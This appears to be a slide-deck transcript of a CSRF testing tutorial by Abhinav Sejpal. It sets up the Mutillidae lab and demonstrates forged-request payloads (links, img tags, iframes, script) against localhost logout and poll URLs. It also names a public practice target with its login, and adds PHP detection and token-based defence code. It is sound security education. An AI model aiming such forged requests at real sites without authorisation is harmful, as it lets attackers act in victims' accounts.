
Oh no, was that CSRF #Ouch


Overview: Are you a web developer, tester or architect? Why don't you stop leaving your web app weak against CSRF attacks? Mission: This session is on detecting and exploiting CSRF / XSRF issues. At the end of this session, the participant will be able to manually identify CSRF / XSRF vulnerabilities in web applications. URL: http://weekendtesting.com/archives/3843 Agenda: Introduction; What is Cross-Site Request Forgery; CSRF check & how to test (IronWASP, CSRF finders); Prevention of CSRF attacks; Q & A. Prerequisite knowledge: Basic technical knowledge about web applications.



  1. OH NO, WAS THAT CSRF? Abhinav Sejpal
  2. WHO AM I: I'm a new-generation exploratory tester. Researcher & reader in my free time. Speaker at the Null & OWASP community. Facilitator at Weekend Testing. Crowd tester (a.k.a. bug bounty hunter). Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc. Proficient at functional, usability, accessibility & compatibility testing. Love to develop nasty code & hack it :). Works as Quality Analyst at passbrains.com, a.k.a. Bug Wrangler.
  3. ~ Publication ~
  4. DISCLAIMER: This presentation is intended for educational purposes only, and I cannot be held liable for any kind of damage done whatsoever to your machine, or other damages. Please don't try this attack on any other system without having context knowledge or permission; this may harm someone directly or indirectly. Feel free to use this presentation for practice or education purposes. ^ I hope you gotcha ^
  5. SOCIAL MEDIA FEED: Hashtags for this session: #CSRF, #BitzNightTesting. Twitter handles for feedback: @Abhinav_Sejpal, @weekendtesting. G+: http://goo.gl/kMAOs1
  6. AGENDA: Introduction; Set up a pen-testing lab; Overview of the HTTP request; Intercept the HTTP request using a proxy (MITM); Understanding cross-site attacks; Testing for a cross-site request forgery risk; Attack; Anti-forgery attacks; Common defences against CSRF.
  7. SETUP THE TEST LAB: Install XAMPP, an acronym for X (to be read as "cross", meaning cross-platform), Apache HTTP Server, MySQL, PHP and Perl.
  8. TARGETED APPLICATION: Client-side language: HTML & JavaScript. Server-side language: PHP. DB: MySQL. Why PHP? Any answer here? Why MySQL? MySQL is the girlfriend of PHP <3
  9. PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE. Source: http://w3techs.com/technologies/overview/programming_lang
  10. PHP: 244M SITES, 2.1M IP ADDRESSES
  11. 2013 Server-side Programming Language of the Year. Don't mind the power of PHP > Facebook & Yahoo. http://w3techs.com/blog/entry/web_technologies_of_the_year
  12. MUTILLIDAE, a.k.a. PLAYGROUND: It's a free, open-source web application provided to allow security enthusiasts to pen-test and hack a web application. V2.x developed by Jeremy Druin, a.k.a. webpwnized.
  13. ALL SET WITH MUTILLIDAE?
  14. AM I VULNERABLE TO 'CSRF'?
  15. OWASP A8 - CSRF: CROSS-SITE REQUEST FORGERY
  16. Facebook post, LinkedIn panel
  17. HOW DOES THE WEB WORK?
  18. 'Send Request'
  19. Proxy (man in the middle): intercept the request & response from the client
  20. CSRF ATTACK CYCLE
  21. CSRF, AKA XSRF: THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS IN A USER'S BROWSER. Permission faking/stealing; disruption of the normal sequence of the site.
  22. DEMO #1: HTTP GET request. Login ID: admin, password: adminpass. http://127.0.0.1/xampp/mutillidae/index.php?do=logout
  23. ANSWER, DEMO 1: a plain link (<a href=...>) to the logout URL.
      <html>
      <title> CSRF Demo 1 </title>
      <a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a>
      </html>
  24. UNDERSTANDING: The logout page is a simple HTTP GET that requires no confirmation. Every user who visited that page would immediately be logged out; that's CSRF in action. Yes, it's not dangerous, but it is annoying.
  25. SO WHAT DO YOU THINK, IS IT ALL ABOUT THE CLICK? Shh, no!! Would you like to write a CSRF exploit without a click?
  26. CSRF GET request with an image tag (<img src=...>): the browser fetches the URL as soon as the page loads, no click needed.
      <html>
      <title> CSRF Demo 1 </title>
      <img src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout">
      </html>
  27. HTTP REQUEST sent by an iframe or by script:
      <iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe>
      <script>
      var X = new Image();
      X.src = "http://127.0.0.1/xampp/mutillidae/index.php?do=logout";
      </script>
  28. CHALLENGE #1
  29. :: SOLUTION #1 :: the user-poll form is submitted by GET and its csrf-token parameter is empty, so a link carrying all the parameters casts the vote.
      <html>
      <title> CSRF Demo 1 </title>
      <a href="http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote"> Click me </a>
      </html>
  30. IS IT EASY TO CREATE A CSRF HTTP REQUEST? No - you should try out IronWASP CSRF PoC Generator, a tool for automatically generating exploits for CSRF vulnerabilities. * One-click PoC * * Hybrid automation * Thanks a ton to Lava & Jayesh.
  31. CHALLENGE #2 { POST HTTP request }
  32. CHALLENGE #3: Add a user without the admin's knowledge
  33. LIVE CHALLENGE: CSRF & XSRF. Update the user info without their knowledge: http://testphp.vulnweb.com/userinfo.php (* SIGNUP DISABLED * Please use the username test and the password test. Copyright © 2014, Acunetix Ltd)
  34. Can we exploit this with Level #2? You've been CSRF'd with a static token!
  35. Let's try with Level 3.
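As an added example (not from the slides), a PHP helper a tester can run over two captures of the same form taken from two fresh sessions. It flags the two weaknesses the challenges above exercise: a form whose anti-forgery field is empty (the csrf-token= in Solution #1) and a token that does not change between sessions (the static token of Level 2). The sample HTML is constructed, and the per-session token shown for the third case is an assumption, not a description of Level 3.

```php
<?php
// Added example, not part of the slides: inspect hidden fields of a form captured
// from two fresh sessions (A and B) and report the CSRF weaknesses seen in the demos.

function hiddenFields(string $html): array {
    // Map hidden input name => value for the captured form (sloppy markup tolerated).
    $doc = new DOMDocument();
    @$doc->loadHTML($html);
    $fields = [];
    foreach ($doc->getElementsByTagName('input') as $input) {
        if (strtolower($input->getAttribute('type')) === 'hidden') {
            $fields[$input->getAttribute('name')] = $input->getAttribute('value');
        }
    }
    return $fields;
}

function assessCsrf(string $captureA, string $captureB): string {
    $a = hiddenFields($captureA);
    $b = hiddenFields($captureB);
    // Find the hidden field whose name looks like an anti-forgery token.
    $tokenName = null;
    foreach (array_keys($a) as $name) {
        if (preg_match('/csrf|xsrf|token|nonce/i', $name)) { $tokenName = $name; break; }
    }
    if ($tokenName === null || $a[$tokenName] === '') {
        return 'VULNERABLE: no anti-forgery token is sent with the form';
    }
    if (!isset($b[$tokenName]) || $a[$tokenName] === $b[$tokenName]) {
        return 'VULNERABLE: token is identical across sessions (static token)';
    }
    if (strlen($a[$tokenName]) < 16) {
        return 'WEAK: token is short enough to guess; review how it is generated';
    }
    return 'OK so far: per-session token present; still confirm the server rejects a wrong one';
}

// Constructed captures standing in for the user-poll form at three protection levels.
$noToken  = '<form method="POST"><input type="hidden" name="csrf-token" value=""><input name="choice"></form>';
$static   = '<form method="POST"><input type="hidden" name="csrf-token" value="a1b2c3d4e5f60718"><input name="choice"></form>';
$perSessA = '<form method="POST"><input type="hidden" name="csrf-token" value="3f9a7c1e5b2d8e0f6a4c2b9d7e1f5a3c"></form>';
$perSessB = '<form method="POST"><input type="hidden" name="csrf-token" value="c8e2a6d4f0b1937e5d2a4c6e8f0b1d3a"></form>';

echo assessCsrf($noToken, $noToken), "\n";   // empty token, as in Solution #1
echo assessCsrf($static, $static), "\n";     // same token in both sessions (Level 2)
echo assessCsrf($perSessA, $perSessB), "\n"; // token differs per session
```

Two captures are needed because a single capture cannot tell a static token from a per-session one; the final "OK so far" still has to be confirmed by replaying the request with a wrong token.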
  36. ~ Keep hacking your code ~ There is no silver bullet to stop this - just trust your code.
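As an added example (not the slides' or Mutillidae's own code), the poll handler from the demo written first without protection and then with a per-session anti-forgery token, the common defence the agenda refers to. The parameter names csrf-token and choice come from the demo URL; the function names, the Origin check and the plain-HTTP lab origin are assumptions.

```php
<?php
// Added example, not the slides' or Mutillidae's code: the demo's poll handler shown
// vulnerable, then hardened with the synchronizer-token pattern (names assumed).

// SameSite keeps the session cookie off most cross-site requests (PHP 7.3+ syntax);
// the token below is still required, since SameSite alone is not a complete defence.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// BEFORE: any request that carries the victim's session cookie casts a vote, so a
// forged link or <img> on another site succeeds, as in Solution #1.
function castVoteVulnerable(array $post): string {
    return 'Vote recorded for ' . htmlspecialchars($post['choice'] ?? '');
}

// One random token per session, embedded in every state-changing form.
function csrfToken(): string {
    if (empty($_SESSION['csrf-token'])) {
        $_SESSION['csrf-token'] = bin2hex(random_bytes(32)); // 256 bits from a CSPRNG
    }
    return $_SESSION['csrf-token'];
}

// AFTER: refuse the request unless the submitted token matches the session token.
// An empty or static token (the Level 2 case) cannot pass this check.
function castVoteProtected(array $post, array $server): string {
    // Defence in depth: browsers add an Origin header to cross-site POSTs.
    $origin = $server['HTTP_ORIGIN'] ?? '';
    $self   = 'http://' . ($server['HTTP_HOST'] ?? '127.0.0.1'); // assumes plain-HTTP lab
    if ($origin !== '' && $origin !== $self) {
        http_response_code(403);
        return 'Rejected: cross-origin request';
    }
    $submitted = $post['csrf-token'] ?? '';
    // hash_equals() runs in constant time, so the comparison leaks no timing signal.
    if (!is_string($submitted) || !hash_equals(csrfToken(), $submitted)) {
        http_response_code(403);
        return 'Rejected: missing or invalid anti-forgery token';
    }
    return 'Vote recorded for ' . htmlspecialchars($post['choice'] ?? '');
}

// The attacker's page cannot read this token: the same-origin policy blocks reading
// cross-site responses, which is what makes the pattern work.
function pollForm(): string {
    return '<form method="POST" action="index.php?page=user-poll.php">'
         . '<input type="hidden" name="csrf-token" value="' . csrfToken() . '">'
         . '<input name="choice" value="nmap"><button>Submit Vote</button></form>';
}

echo $_SERVER['REQUEST_METHOD'] === 'POST' ? castVoteProtected($_POST, $_SERVER) : pollForm();
```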
  37. POPULAR COOL FINDINGS: Facebook CSRF worth USD 5000 by Amol; Google Groups profile CSRF; Google account display pic deletion; Facebook account deactivation. Advanced learnings - CSRF token validation fail: http://haiderm.com/csrf-token-protection-bypass-methods/
  38. INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING ON TWITTER. Thank you, http://garage4hackers.com/ community.
  39. CREDITS - Twitter folks - @riyazwalikar, @TroyHunt, @yog3sharma, @makash & @anatshri. Big thank you to @weekendtesting, @srinivasskc & you all.
  40. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
  41. LICENSE AND COPYRIGHTS: https://slides.com/abhinavsejpal/weekend-testing-csrf. Copyright 2013-2014 Abhinav Sejpal (CC BY-NC-ND 3.0, Attribution-NonCommercial-NoDerivs 3.0 Unported). Dedicated to my lovely daddy.
